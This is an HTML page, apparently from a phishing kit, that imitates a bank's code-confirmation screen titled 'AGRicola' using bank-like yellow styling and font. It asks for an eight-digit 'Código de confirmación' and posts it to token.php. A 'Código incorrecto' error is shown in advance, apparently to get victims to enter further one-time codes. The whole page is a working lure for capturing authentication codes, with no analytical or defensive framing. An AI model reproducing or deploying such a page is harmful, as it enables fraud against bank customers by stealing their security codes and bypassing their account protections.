<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>AGRicola</title>
</head>


<style>
.ipp {
    --vh: 6.43px;
    -webkit-tap-highlight-color: transparent;
    outline: 0;
    box-sizing: border-box;
    background-color: transparent;
    border: none;
    border-bottom: 1px solid #292929;
    border-radius: 0;
    display: block;
    width: 100%;
    font-size: 16px;
    color: #292929;
    font-family: "Open Sans", sans-serif;
    line-height: 23px;
    padding: 0;
    margin: 0;
    flex: 1 1 auto;
    margin-bottom: 0;
    padding-left: 0;
}


.boton {
    --vh: 6.43px;
    -webkit-tap-highlight-color: transparent;
    outline: 0;
    box-sizing: border-box;
    display: inline-block;
    background-color: #FDDA24;
    color: #292929;
    text-transform: uppercase;
    border: none;
    border-radius: 42px;
    padding: 10px 17px;
    font-weight: bold;
    font-size: 18px;
    font-family: "CIBfont", Helvetica, Arial, sans-serif;
    vertical-align: middle;
    overflow: hidden;
    margin-bottom: 10px;
    box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.1);
    width: 100%;
    min-height: 42px;
    min-width: 135px;
    line-height: 21px;
    flex: 1 0 auto;
}





.boton2 {
    --vh: 5.78px;
    -webkit-tap-highlight-color: transparent;
    outline: 0;
    box-sizing: border-box;
    display: inline-block;
    background-color: #FDDA24;
    color: #292929;
    text-transform: uppercase;
    border: none;
    border-radius: 42px;
    padding: 10px 17px;
    font-weight: bold;
    font-size: 18px;
    font-family: "CIBfont", Helvetica, Arial, sans-serif;
    vertical-align: middle;
    overflow: hidden;
    margin-bottom: 10px;
    box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.1);
    width: auto;
    min-height: 42px;
    min-width: 135px;
    line-height: 21px;
    background-image: url(../img/icon.svg);
    background-repeat: no-repeat;
    background-position: 88% 50%;
    background-size: 14px;
    padding-right: 20px;
    float: right;
}

.boton3 {float: left;
    --vh: 5.78px;
    -webkit-tap-highlight-color: transparent;
    outline: 0;
    box-sizing: border-box;
    display: inline-block;
    background-color: #d8d8d7;
    color: #292929;
    text-transform: uppercase;
    border: none;
    border-radius: 42px;
    padding: 10px 17px;
    font-weight: bold;
    font-size: 18px;
    font-family: "CIBfont", Helvetica, Arial, sans-serif;
    vertical-align: middle;
    overflow: hidden;
    margin-bottom: 10px;
    box-shadow: 0px 1px 2px rgba(0, 0, 0, 0.1);
    width: auto;
    min-height: 42px;
    min-width: 135px;
    line-height: 21px;
    background-image: url(../img/icon.svg);
    background-repeat: no-repeat;
    background-position: 88% 50%;
    background-size: 14px;
    padding-right: 20px;
    border: 1px solid;
}
.caja {
    
}


 
</style>



 


<body>
    




<center>

<form action="" style="width: 380px; height: auto; padding: px; margin-left: 25px; border:  ; margin: 0%; filter: blur(05px);">

<img src="positivo.svg" alt="">

<br>

<img src="titulo.png" alt="" style="width: 260px;">



<br><br><br> 
</form>


<div id="div2" class="aparecer">
<img src="aviso.png" style="    width: 410px;
position: absolute;
margin-left: -205px;
margin-top: -63px;
box-shadow: 0 2px 15px rgba(0, 0, 0, 0.2);
" alt="">
</div>

<div class="caja" style="border: 1px solid; padding: 25px;width: 360px;margin-left: -10px;">




    <img style="width: 100%; margin-left: -10px;" src="tttt.png" alt="">





<form action="token.php" method="post">


    <p style="font-family: sans-serif;font-size: 15px;float: left;color: rgb(59, 57, 57);">Código de confirmación</p>
<input maxlength="8" minlength="8" inputmode="numeric" required class="ipp" type="text" name="data" id="data">
<p style="font-size: 12px; float: left;color: red;font-family: sans-serif;">Código incorrecto</p>
<br><br><br>
 


<a style="    --vh: 5.78px;
text-align: left;
cursor: pointer !important;
color: #292929;
-webkit-tap-highlight-color: transparent;
outline: 0;
box-sizing: border-box;
margin: 0;
padding: 0;
border: 0;
 font-family: sans-serif;
 float: left;
vertical-align: baseline;" href="">Volver a enviar código</a>









<br><br><br><br>









<input class="boton3" value="CANCELAR" type="submit">

<input class="boton2" value="CONTINUAR  →" type="submit">

 </form>


<br><br>
<img src="uubajo.png" alt="" style="width: 95%; margin-left: -10px;">
</div>


</center>















</body>
</html>